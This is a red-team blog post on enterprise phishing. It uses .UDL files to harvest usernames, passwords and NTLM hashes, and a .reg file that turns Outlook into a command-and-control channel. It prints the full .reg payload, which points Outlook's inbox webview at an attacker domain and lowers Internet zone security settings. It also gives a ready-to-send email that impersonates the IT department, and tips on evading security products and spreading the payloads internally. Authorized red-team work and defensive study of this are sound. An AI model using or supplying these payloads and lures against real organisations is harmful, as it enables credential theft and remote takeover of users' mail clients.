Enterprise Phishing - 2kb to pwn! .UDL and .reg payloads for Initial Access and Credential Harvesting

05 May 2025 (1634 Words, 10 Minutes)

Brief Introduction

Enterprise phishing - a phishing campaign which is done against a mature security stack of enterprise grade solutions, that implies, you’re up against Microsoft ATP, safelinks, defender for endpoint, defender for Office 365, DLPs, email and secure web gateway solutions, remote browser isolations, EDRs, etc. Most of these defensive solutions are stacked together.

Not so enterprise grade phishing would be - phishing against some end user who uses gmail on windows, with some basic AV. Hope that draws a stark contrast here.

Traditionally, phishing campaigns are broadly classified into two categories - credential harvesting and/or malicious attachments. Credential harvesting attempts are usually accompanied by grabbing the username, password, session tokens, OTPs etc over the phishing domain, which is a live asset and could be shared to targets over the mail, sms, pdfs with links etc. Meanwhile in the case of malicious attachments - usually there’s some packed payload which is password protected, there are multiple aspects to it - loader, dropper, you might be sideloading, or its some malicious macro or package based Installation etc. here you need to convince the user to download the attachment, unprotect it, double click to see the invoice or whatever, then you might get a callback to your C2.

There are many challenges with both of those, most of the attempts are mitigated by the Microsoft ATP and defender for Office 365 itself, on top of that we have Internet security modules from Zscaler and every other vendor has such implementation, which works in your browser, over the mail client, in your terminal and everywhere else on your endpoint.

Over the years I have realized how the enterprises configure policies against phishing, if your attachment is password protected - it’s not allowed, you can’t send or receive such a file, there’s a separate mechanism for file share in the company. If your attachment is bigger than 7mb, again it’s not allowed, only pdf, ppt, docx is allowed, anything else gets blocked immediately, so on and on, you get the context. It varies from company to company, but still, out of the box email security solutions are pretty effective at this point, forget about custom policies.

As a Red Teamer, creating a payload which is effective against the email security solutions is in itself very difficult, on top of that I have to beg the users to check their invoice or payroll, or register on a lucky draw website, or acknowledge some updates in the security policy etc. End user awareness is increasing day by day, which is a good thing for the overall security posture, but as a Red Teamer, a day without good fishing is a day wasted (at least during ops).

Coming to the choice of payloads, Imagine, if you can utilize a payload of size less than 1kb which slips right into the inbox of a user, which can be opened directly from the email client (mostly on desktop application), and it isn’t flagged or blocked by the email security solutions, DLPs or EDRs. Something which can grant you username, password and NTLM hashes on a good day, if you’re lucky.

I love .UDL payloads for my phishing campaigns in the enterprise environment. It could be utilized for Internal phishing campaigns from the network file share, or externally, over the mail you can share the payload, unpacked, raw, and it works just fine. The target doesn’t even need to download and execute the payload from the email attachments, the user can simply right click and open it, effectively bypassing safe attachments, smartscreen, MotW, and it doesn’t require elevated privileges or credentials to execute it, so no UAC bypass is needed (at least I haven’t encountered such scenario yet).

UDL payload can be opened from the desktop client.

Credential Harvesting - grabbing hashes over port 80

I use it for high value targets, it’s something which could be used against IT teams, or developers and the end user likewise. There’s nothing new in it and it’s all a processed TTP already, You can refer to the amazing blog by Oddvar Moe on how to set up the UDL payload.

Actual content of the UDL payload, just 3 lines ;)

When a user downloads the payload for the first time and runs it, this is how it looks like on disk, they see a minor MotW warning from windows.

What the user sees when they open the .UDL payload -

Credential Harvesting - username & password

The Red Team advantage here is - if we are able to grab the username and password of a high value target, chances are high that it works, you don’t have to grab the NetNTLMv2 hashes out of a network via LLMNR poisoning and then relay/crack it, it’s in cleartext already. You don’t have to perform password spray in the target environment. We can perform credential stuffing using that same password, across the internal application, and mail clients against the target. So there’s this element of stealth, evasion, and opsec, all of these combined makes it so effective. (As long as it works, it’s flawless). It’s like an instant-infostealer type thing, but just for the username:password:hash pair. As of today, chances are low that you’ll get hashes out of the UDL payloads, unless their infra is outdated and old.

The target should have Outlook (classic) 16.0 desktop application, which is very common. The Outlook web view will not let the user open the attachment, but they can download and execute it.

Phishing email template could be of any choice, most common ones which I use is -

[Subject: Outlook mail synchronization issue]

Dear Team, 

Please ensure that your Outlook Calendar is properly synchronized to our Outlook Exchange servers on-premise. We have received several complaints of delayed or undelivered emails across departments. 

For that please download the attachment and enter your details to "Test connection", if you face an error, try that again. If the issue persists then download the other attachment and execute it, it's a quick fix. 

NOTE: You do not have to submit the credentials, just click on "Test connection" button to verify if your mail client is properly synchronized. IT Team doesn't ask for your username or password. 

Best Regards
IT Department

Enter Outlook based C2 - Specula

This is the ‘other attachment’ we were talking about in the previous phishing template. The beauty of .UDL payload is - that regardless of user’s credential being the legit ones, Microsoft will throw an “Microsoft Data Link Error”, which looks something like this -

Meanwhile, in the server backend, where we have provisioned our Responder (listener), we would be harvesting their credentials.

Now the user will either re-enter their credentials, which will be skipped by our listener if its the same. Otherwise they will download the other payload - a .reg file, which btw also slips under the radar and its also less than 1kb in size. It can either be downloaded from the email attachments or opened directly from the desktop application.

Beauty of .reg payload: It requires only 2 clicks to be effective, one will be a minor MotW consent prompt and the other prompt will be for the confirmation of the changes made to the registry. One thing to note here is - even the low privileged user can execute the .reg payload, if the security policies are not enforced which explicitly denies them from making any modifications. Leading EDR vendors and DLP solutions usually won’t allow any user to edit the registry either via .reg file or manually.

The user has to do - yes and ok. Lmao, that’s it, and we will gain a callback from their end.

yes ok

Initial Access in the presence of EDR and DLP

This is actual content of a typical SpeculaC2 .reg payload:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Webview\Inbox]
"url"="https://attacker.domain/plugin/search/"
"security"="yes"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{261B8CA9-3BAF-4BD0-B0C2-BF04286785C6}\iexplore]
"Flags"=dword:00000004
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"140C"=dword:00000000
"1200"=dword:00000000
"1201"=dword:00000003

Its magical, if you ask me the size of these payloads in real Red Team Operations, the .UDL payload roughly goes from 366 bytes to 566 bytes, and .reg payload is typically 495 bytes, both of them combined is even less than 1kb. Under normal circumstances it’s never gonna exceed 1.5kb.

I won’t go into the weeds of setting up SpeculaC2, you can refer these two materials by Christopher Paschen and Oddvar Moe.

• TrustedSec Blog: Specula - Turning Outlook into a C2 with one registry change
• YT Playlist: Specula Tutorials

We can do a whole lot of fun with SpeculaC2, for instance, sending emails from the mailbox of the compromised user and deleting the mail automatically after it is sent, also we can give it attachments.

Both of the payloads, .UDL and .reg, could be used for Internal phishing campaigns as well, we can spread them in the excessively open network shares, or in case, we can spread .UDL payload over the compromised user’s session from SpeculaC2 itself. Endless possibilities.

Red Teaming is golden at this point. We’ve got credentials and a shell. What a blessing.

It’s all fun and games until you get your ass handed over to you.

Once upon a time, I was utilizing the .reg payload against Zscaler’s Intrusion Prevention System. The default configuration of server was so much fingerprinted, that it got blocked almost instantly. Then I had to edit and obfuscate it for the next couple of hours and test the payload again and again.

Known browser exploits?!

After so many attempts I was able to gain The Callback, my precious… but as soon as I executed a basic system enumeration command, I got blocked again, this time, in the webview of Outlook itself the message was displayed.

So definitely, its fingerprinted heavily. Unfortunately I couldn’t get much time to spend against Zscaler’s IPS. Otherwise evading it is always fun.

I am positive about the success rate of .UDL and .reg payload, and both of them combined makes a real difference in a Red Teamer’s life. Do let me know if you’ve tried these goodies in different configurations. I am more than happy to hear your war stories.

If you have any questions or need personal guidance then feel free to contact me here